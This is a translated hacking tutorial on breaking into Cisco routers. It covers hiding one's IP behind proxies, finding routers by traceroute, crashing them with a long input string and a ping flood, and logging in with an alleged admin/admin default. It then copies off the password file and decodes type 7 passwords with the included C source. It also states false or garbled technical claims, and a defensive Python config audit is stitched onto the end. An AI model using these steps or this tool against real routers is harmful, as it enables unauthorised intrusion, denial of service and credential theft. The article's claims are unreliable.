Attack Cisco Router

Description: Originally from Blacksun, translated by Dream Wake Time. This is a very good article, and I am very happy to share it with you!

----------------------------------
Table of contents:
----------------------------------
- What is an IP address?
- What is an ISP?
- What is a TCP/IP packet?
- How to hide your IP address?
- How to use Telnet?
- How to use HyperTerminal?
- How to use ping?
- How to use Traceroute?
- How to use a proxy server?
-------------------------------------
- Part 1: Why attack the Cisco router?
- Part 2: How to find a Cisco router?
- Part 3: How to break into a Cisco router?
- Part 4: How to crack the password?
- Part 5: How to use a Cisco router?

----------------------------------------------
What is an IP address?

IP is an abbreviation of Internet Protocol. Computers recognize other computers on the network by their IP addresses. This is how you can be kicked from IRC, and how others can find your ISP and your probable location. An IP address is easy to get; basically, it can be obtained in the following ways:

- You visit a website, and your IP is recorded.
- On IRC, someone gets your IP address.
- In ICQ or OICQ, someone can simply get your IP address by using some small tools.
- If your computer is connected to someone else's, they can run systat to see which computers are connected (displayed as IP addresses).
- Someone sends you a message containing a Java program that can obtain your IP address.

There are many more ways to get IP addresses, including some Trojans and backdoor programs.

----------------------------------------------
What is an ISP?

ISP is an abbreviation of Internet Service Provider: the company that connects you to the Internet. You connect to it every time you dial in.
We can run a traceroute to find our ISP (traceroute is also introduced below). You should see something like this:

    Tracert 222.2222.22
    Tracing route to [221.223.24.54] over a maximum of 30 hops.
     1  147ms  122ms  132ms  Your.ISP [222222.22.21]   <<< Your ISP
     2  122ms  143ms  123ms  Isp.firewall [22222.22.20]   <<
     3  156ms  142ms  122ms  Aol.com [207.22.44.33]
     4  *  *  Request timed out
     5  101ms  102ms  133ms  Cisco.Router [194.33.44.33]   <<
     6  233ms  143ms  102ms  Something.IP [111.11.11]
     7  222ms  123ms  213ms  Netcom.com [122.11.21.21]
     8  152ms  211ms  212ms  Blahblah.TTS.NET [121.21.21.33]
     9  122ms  223ms  243ms  altavista.34.com [121.22.32.43]   << Target ISP
    10  101ms  122ms  132ms  221.223.24.54.altavista.34.com [221.223.24.54]
    Trace complete.

----------------------------------------------
What is a TCP/IP packet?

TCP/IP is the abbreviation of Transmission Control Protocol and Internet Protocol. A TCP/IP packet is a compressed packet that is sent to another computer. This is how data is transmitted over the network: by sending packets. The header of the packet includes the IP address of the machine that sent it. You can rewrite the packet so that it appears to come from someone else! You can access many systems this way, illegally, without being discovered. Of course, you need to run Linux or use some software to do this. This tutorial will not show you how to do this on a Cisco router, but it is very convenient for attacking some systems. If you try to attack a system and cannot get started, you can always try this ...

----------------------------------------------
How to hide your IP address?

With software such as Genius 2 or DC IS, you will be able to run identd. You can then change your IP address at any time. When you are kicked out of IRC, you can use it to get back in. You can also use it when you visit other systems, so that the wrong IP address is recorded ...

----------------------------------------------
How to use Telnet?

Choose "Run" from the Start menu, type telnet, and click OK. Once Telnet is running, you can change some options: click Terminal > Preferences.
Here you can change the size of the buffer. You can also turn "Local Echo" on or off. If you turn "Local Echo" on, your computer displays everything you type, and the connected computer echoes it back as well. So you will see something like this: you type "hello", and what you see is "hhelelollo", because the returned information is mixed with what you typed. The only reason I do this is to see whether the connected machine responds to me. By default, Telnet connects only to the Telnet port, i.e. port 23.
You are not limited to port 23; you can change the port at any time. You can change it to 25, which is the port of the mail service, or to 21, which is the FTP port. There are thousands of ports, so you have to choose the correct one!

----------------------------------------------
How to use HyperTerminal?

HyperTerminal allows your computer to listen on a port. If information arrives at this port, you can carry out a transfer. HyperTerminal is under Start > Programs > Accessories > Communications; if it is not there, you can install it from the Control Panel. First you have to choose the connection protocol: choose "TCP/IP Winsock", then enter the computer you want to connect to and select the port below it. You can choose Call > Wait for Call to wait for a file. Other computers can then connect to you through that port, and you can also chat or send files.

----------------------------------------------
How to use ping?

Ping is very simple: in MS-DOS mode, type "ping IP address". By default it pings three times, but you can set this yourself. "ping IP address -t" makes it ping non-stop. To change the size of the ping, use "ping -l (size) ip.address". Ping actually sends a packet to the remote machine, the remote machine returns the packet when it receives it, and we can see how long this takes. The shorter the time, the faster the connection; when the network is congested, packets are lost. Pinging slows down the machine being pinged, and when the traffic is too heavy it can even bring the machine down. A one-minute ping attack can crash a Win98 computer (because its connection buffer overflows: with too many connections, Windows decides to take a rest :>). A ping attack uses a lot of your bandwidth, so your bandwidth has to be larger than the target machine's (unless the target machine is running Windows 98 and you have a good modem; in that case you can knock it offline within a minute). A ping attack has no effect on robust systems.
Note: the DOS -t option is not a ping attack; it only pings continuously, with long intervals in between. On a Unix or Linux machine, you can use the -f option to carry out a real ping attack. In fact, if your distribution is not POSIX-compliant (POSIX: Portable Operating System Interface based on Unix), it is not a real Unix/Linux distribution. So if you have an OS that calls itself Unix or Linux, it has -f.

----------------------------------------------
How to use Traceroute?

To trace your connection (that is, to observe the route your connection takes to the target machine), just type "tracert IP address" in MS-DOS mode. You will see a list of computers: the machines between you and the target. You can use this method to determine whether there is a firewall, or to determine someone's ISP (Internet Service Provider). To determine the ISP, just look at the IP address immediately before the target machine; it should be the ISP's router.

Basically, this is how traceroute works: a TCP/IP packet has a value in its header (in the IP header; if you don't know what this means, it doesn't matter, just read on) called TTL, an abbreviation for Time To Live. Each time a packet passes through a router, its TTL value is reduced. This keeps packets from circulating in the network and consuming bandwidth. Whenever a packet's TTL value reaches 0, the packet is dropped and an ICMP error is returned to the sender. Traceroute first sends a packet with a TTL value of 1, which comes back very soon. By checking the header of the ICMP error, traceroute knows where the packet's first hop was. Then a packet with a TTL value of 2 is sent, and what comes back identifies the second hop. This continues until the final destination is reached, and then you know the entire path. Do you understand now?

----------------------------------------------
How to use a proxy server?

Look for a proxy server online that offers the port you need. Once you have found one, you can connect to another computer through the proxy server with Telnet or HyperTerminal. This way your IP address is not revealed to the other computer.

----------------------------------------------
Part 1: Why attack the Cisco router?

You may wonder: why attack a Cisco router? The answer is that it is very useful for breaking into other systems ... Cisco routers are very fast; in one system, some are connected to 18 T1 lines. They are also very flexible: although most run Telnet, they can play a role in DoS attacks or in attacks on other systems. Thousands of packets also pass through them, and these can be captured ... Many Cisco routers are also trusted by the systems around them, which gives you a certain amount of access to the other computers on their network.

----------------------------------------------
Part 2: How to find a Cisco router?

Finding a Cisco router is a simple task; almost every ISP routes through at least one Cisco router. The easiest way is to run tracert under DOS: it shows the many computers between you and another computer, and among them there is bound to be one with "cisco" in its name. If you find one, write down its IP address.
Typically port 2001 (Cisco router management) and port 23 are open! Now you have the location of the Cisco router, but it may be protected by a firewall, so you have to check whether it is blocked; if there is a response, it is probably not blocked. Another method is to try some of the Cisco router's ports. You can use telnet on port 23: if it asks for a password but not a user name, you are probably at a firewall. Try to find a router that is not protected by a firewall, because this tutorial is about routers, not about how to get through firewalls. When you are sure you have found a good system, you should find a proxy server that allows port 23, so that your IP address will not be recorded by the router.

----------------------------------------------
Part 3: How to break into a Cisco router?

Cisco routers running version 4.1 of the software (now in common use) are easy to attack.
You just connect to a Cisco router through a proxy server and enter a long string, such as:

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now wait: the Cisco system will restart. You can say that you have knocked it over; it is offline ... But after 2-10 minutes it will recover, and that is when we should get in. If nothing happens, it is not running the vulnerable software, and you can try several DoS attacks, such as a large number of pings. Under DOS, type "ping -l 56550 cisco.router.ip -t"; this will have the same effect and can bring the machine down. Be careful! I believe you know how to protect yourself. If it is passive, find another proxy server for the connection. The user name is "admin" and the password is "admin", because these are the defaults: since the router was temporarily knocked out, it returns to its default state.

Now that you are in, you should get the password file! Systems run different software, but most have a prompt like "htl-textil". Now type "?" and see what you get. You will see a lot of commands, and among them you will find a transfer command. With this command, as the current admin user, send the password file to port 23 of your own computer. Before you do this, you have to set up HyperTerminal. After you send the file, HyperTerminal will ask whether you want to receive it; choose to save it on your computer. Go offline. You have passed the most difficult part and are ready to start cracking the password.

----------------------------------------------
Part 4: How to crack the password?

Now that you have the password file, you have to crack it to keep getting into the router. You can run software such as John the Ripper to crack it. This is the easiest way, and the one I recommend.
Another way is to try to decode it. This requires decoding software, and with some decoding software you need to have plenty of patience.
There is software written specifically to decode Cisco router password files. You can compile it under Linux:

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed XOR key table used by the "password 7" encoding. */
char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7";
char pw_str2[] = "enable-password 7";

char *pname;

/*
 * Decode a "password 7" string. The first two decimal digits give the
 * starting offset (seed) into xlat; each following pair of hex digits is
 * one password byte XORed with the next xlat entry.
 * Returns 0 on success, -1 on malformed input.
 */
int cdecrypt(char *enc_pw, char *dec_pw)
{
    unsigned int seed, i, val = 0;
    size_t len = strlen(enc_pw);

    if (len & 1)
        return -1;

    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;

    seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
    if (seed > 15)
        return -1;

    for (i = 2; i <= len; i++) {
        if (i != 2 && !(i & 1)) {
            /* Refuse input that would read past the end of the key table. */
            if (seed >= sizeof(xlat))
                return -1;
            dec_pw[i / 2 - 2] = val ^ xlat[seed++];
            val = 0;
        }

        val *= 16;

        enc_pw[i] = toupper((unsigned char)enc_pw[i]);
        if (isdigit((unsigned char)enc_pw[i])) {
            val += enc_pw[i] - '0';
            continue;
        }
        if (enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
            val += enc_pw[i] - 'A' + 10;
            continue;
        }
        /* Anything else is only valid as the terminating NUL. */
        if (len != i)
            return -1;
    }

    dec_pw[len / 2 - 1] = 0;
    return 0;
}

int usage(void)
{
    fprintf(stdout, "usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s -h\n", pname);
    return 0;
}

int main(int argc, char **argv)
{
    char passwd[65];

    pname = argv[0];

    if (argc > 1) {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-') {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                /* Require an argument short enough to fit in passwd. */
                if (argc < 3 || strlen(argv[2]) > 2 * sizeof(passwd) ||
                    cdecrypt(argv[2], passwd)) {
                    fprintf(stderr, "error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknown option.\n", pname);
            }
            return 0;
        }
    }

    usage();
    return 0;
}
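The weaknesses Parts 3 and 4 depend on (Telnet on port 23, the default "admin" account, and reversible "password 7" strings) can all be found by reading a router's configuration. The following is an added example, not part of the original article: a Python audit run over a constructed IOS-style configuration; the function name `audit_config`, the finding labels and every value in the sample are assumptions made for illustration.

```python
import re

# Constructed sample config; every value is a placeholder, not from a real device.
SAMPLE_CONFIG = """\
hostname lab-rtr
enable password 7 00112233445566
username admin password 7 00112233445566
username netops secret 9 $9$placeholder$placeholder
line vty 0 4
 password 7 00112233445566
 transport input telnet
line vty 5 15
 access-class 10 in
 transport input ssh
"""

TYPE7 = re.compile(r"\bpassword 7 \S+")

def audit_config(text):
    """Return sorted (line_no, finding) pairs for the weaknesses the article relies on."""
    findings, vty = [], None

    def close_vty(block):
        # Assumption: a vty block with no "transport input" line is treated as Telnet-capable.
        if block and block["telnet"]:
            findings.append((block["start"], "vty accepts Telnet (port 23)"))
        if block and not block["acl"]:
            findings.append((block["start"], "vty has no access-class"))

    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if raw[:1] != " ":                      # a top-level command ends any vty block
            close_vty(vty)
            is_vty = line.startswith("line vty")
            vty = {"start": no, "telnet": True, "acl": False} if is_vty else None
        elif vty is not None:
            if line.startswith("transport input"):
                vty["telnet"] = bool({"telnet", "all"} & set(line.split()[2:]))
            elif line.startswith("access-class") and line.endswith(" in"):
                vty["acl"] = True
        if TYPE7.search(line):
            findings.append((no, "reversible type 7 password"))
        if line.startswith("enable password"):
            findings.append((no, "enable password set (use enable secret)"))
        if re.match(r"username admin\b", line):
            findings.append((no, "default account name 'admin'"))
    close_vty(vty)
    return sorted(findings)

if __name__ == "__main__":
    for no, finding in audit_config(SAMPLE_CONFIG):
        print(f"line {no}: {finding}")
```

Every finding has a configuration-level fix: `enable secret` and `username ... secret` in place of type 7 passwords, `transport input ssh` on the vty lines, and an `access-class` restricting which addresses may connect.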